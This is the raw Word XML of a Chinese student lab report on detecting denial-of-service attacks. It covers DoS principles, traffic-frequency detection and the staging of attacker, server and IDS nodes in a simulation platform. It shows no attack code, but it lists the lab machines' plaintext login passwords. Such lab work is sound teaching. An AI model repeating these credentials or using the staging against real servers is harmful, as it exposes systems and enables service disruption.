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1911F" w14:textId="047D89BA" w:rsidR="001D32B6" w:rsidRPr="001D32B6" w:rsidRDefault="001D32B6" w:rsidP="001E726C">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk180072657"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r w:rsidR="00471014">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidR="00471014">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C7C66" w:rsidRPr="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>拒绝服务攻击检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57403DDF" w14:textId="4CDC6C3A" w:rsidR="001D32B6" w:rsidRPr="001D32B6" w:rsidRDefault="001D32B6" w:rsidP="001E726C">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>班级：2022211801    学号：2022211570    姓名：项枫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815E5D9" w14:textId="1350BA00" w:rsidR="00D7464B" w:rsidRPr="001D32B6" w:rsidRDefault="001D32B6" w:rsidP="001E726C">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="000225CC" w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18961C9A" w14:textId="455BFA90" w:rsidR="00E02C8A" w:rsidRPr="009C7C66" w:rsidRDefault="00E02C8A" w:rsidP="00E02C8A">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网络安全虚拟仿真实验系统上自主设计拒绝服务攻击场景，综合编程技术、计算机网络和网络安全等知识，完成拒绝服务攻击检测实验，包括开发和运行拒绝服务攻击程序，以及使用工具分析网络攻击流量和检测网络攻击等。深刻理解和掌握拒绝服务攻击实现资源消耗的原理、网络攻击分析方法、网络攻击检测等，实现对“网络攻击-安全分析-检测告警”的网络安全综合能力培养和实践训练。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7B748" w14:textId="131C2E28" w:rsidR="009C7C66" w:rsidRPr="001D32B6" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">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t>二</w:t>
      </w:r>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20010482" w14:textId="77777777" w:rsidR="009C7C66" w:rsidRPr="00083D28" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00083D28">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1、拒绝服务攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D52A8" w14:textId="66FD570A" w:rsidR="009C7C66" w:rsidRPr="009C7C66" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务攻击是针对网络应用有限数量的服务能力，发起大规模的网络服务的请求，耗尽网络应用能够提供的服务计算资源等，使网络应用无法对正常用户的请求进行服务，实现拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BD2C7" w14:textId="22B6955C" w:rsidR="009C7C66" w:rsidRPr="00083D28" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00083D28">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2、拒绝服务攻击流量特征分析 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC2BA0F" w14:textId="518C9D73" w:rsidR="009C7C66" w:rsidRPr="009C7C66" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过网络流量捕获工具捕获与网络应用服务器交互的网络流量，对请求服务和响应的网络应用协议网络流量进行分析，查找网络应用无法为网络用户提供服务的原因。观察每个独立的网络应用请求，都是正常的建立连接、请求网络服务操作过程。但是能够观察到来自于同一个源地址的网络服务请求的数量多、单位时间内的请求频率高，超过了单个网络用户访问网络应用服务的正常表现。这种异常的大量、高频度访问行为可作为拒绝服务攻击流量的特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9702A" w14:textId="64C2D91D" w:rsidR="009C7C66" w:rsidRPr="00083D28" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00083D28">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3、基于流量频率特征的拒绝服务攻击检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E93C12" w14:textId="22101FE1" w:rsidR="009C7C66" w:rsidRDefault="009C7C66" w:rsidP="009C7C66">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7C66">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于拒绝服务攻击具有大量、高频度访问的异常行为特征，将对网络应用的高频请求作为拒绝服务攻击的检测识别特征，配置到入侵检测工具的攻击检测和告警规则中，对网络流量进行检测，实现对拒绝服务攻击的识别和报警。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DADE38" w14:textId="5E46F743" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00DA262B">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lastRenderedPageBreak/>
        <w:t>三</w:t>
      </w:r>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A617CC" w14:textId="3E99F34F" w:rsidR="00E66906" w:rsidRPr="00E66906" w:rsidRDefault="00E66906" w:rsidP="00DA262B">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E66906">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（一）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第一种</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66906">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>拒绝服务攻击实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>——运行提供的代码CC_Dos_Web.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0679AB" w14:textId="7A7062BC"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步骤1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>构建拒绝服务攻击场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76843D"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步骤要求：构建包括拒绝服务攻击网络拓扑，包含网络应用拒绝服务攻击者、网络用户、网络应用服务器、交换机、入侵检测等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC004F"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涉及知识：拒绝服务攻击场景、入侵检测接入方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64C2F8" w14:textId="5006BC68"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1）登陆网络安全虚拟仿真实验系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323902E"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2）创建拒绝服务攻击网络拓扑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265EEA23" w14:textId="77777777" w:rsid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选择“实例管理-创建实例拓扑”。以Web网络应用为例，通过拖拽方式在场景中构建拒绝服务攻击者（例如：Web拒绝服务攻击者）、网络用户、网络应用服务器（例如：Web服务器）、交换机、入侵检测等设备，通过绘制连接线完成设备之间的网络互联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE170CB" w14:textId="77777777" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="000B1CDF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9F30A7" wp14:editId="2A4CD5D5">
            <wp:extent cx="5268288" cy="568518"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="95727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7977" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="80557"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="569168"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1095E" w14:textId="77777777" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="000B1CDF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="608691C6" wp14:editId="4E46FF60">
            <wp:extent cx="5269656" cy="834887"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="286221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21306" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="71454"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="835624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C12B19" w14:textId="77777777" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="000B1CDF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F5F4F94" wp14:editId="267CB091">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1228698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98204" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD69D0" w14:textId="1A421C0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lastRenderedPageBreak/>
        <w:t>步骤2</w:t>
      </w:r>
      <w:r w:rsidR="001B49EF">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>配置和部署拒绝服务攻击场景的节点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D910D7A"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步骤要求：完成网络应用拒绝服务攻击者、网络用户、网络应用服务器的运行资源和操作系统配置，以及网络流量监听镜像配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BEF502"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涉及知识：入侵检测通过旁路接入方式捕获镜像的网络流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5813A" w14:textId="08E03292" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00A67159">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 1）配置拒绝服务攻击者（例如：Web拒绝服务攻击者）、网络用户、网络应用服务器（例如Web服务器）等设备运行环境的处理器、内存、硬盘等硬件参数，以及加载</w:t>
      </w:r>
      <w:r w:rsidR="00A67159">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>Win10操作系统等。Web拒绝服务攻击者、网络用户、Web服务器加载的操作系统模板分别为Win10_Dos_WebAttacker、Win10_DoS_NetUser、Win10_Dos_WebServer（其上安装有IIS的Web服务），远程登陆用户名都为 admin ，密码都为 Planet9Secret 。入侵检测登陆用户名为 root ，密码为 Planet9Secret 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281F80F" w14:textId="77777777" w:rsidR="001B49EF" w:rsidRDefault="001B49EF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A792DA" wp14:editId="1250A8B2">
            <wp:extent cx="5260107" cy="2230967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="804218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8431" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="23583"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5294093" cy="2245381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1630B0" w14:textId="77777777" w:rsidR="001B49EF" w:rsidRDefault="001B49EF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38837708" wp14:editId="2566D94B">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="447574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74764" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7156B696" w14:textId="77777777" w:rsidR="001B49EF" w:rsidRDefault="001B49EF" w:rsidP="001B49EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B224771" wp14:editId="2D1B7E76">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1435366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66950" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C8BE8" w14:textId="17EA6882" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="000B1CDF">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2）配置网络镜像，使流经交换机的网络流量通过镜像口流入入侵检测系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71472E" w14:textId="79DDC2DF" w:rsidR="000B1CDF" w:rsidRPr="00DA262B" w:rsidRDefault="000B1CDF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B89DC13" wp14:editId="54D9637B">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="103573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4560" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784A19D" w14:textId="77777777" w:rsid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3）保存拒绝服务攻击场景，等候</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>分钟级</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>的部署时间后，拒绝服务攻击网络环境构建完成，通过节点详情，看到部署完成的所有设备。</w:t>
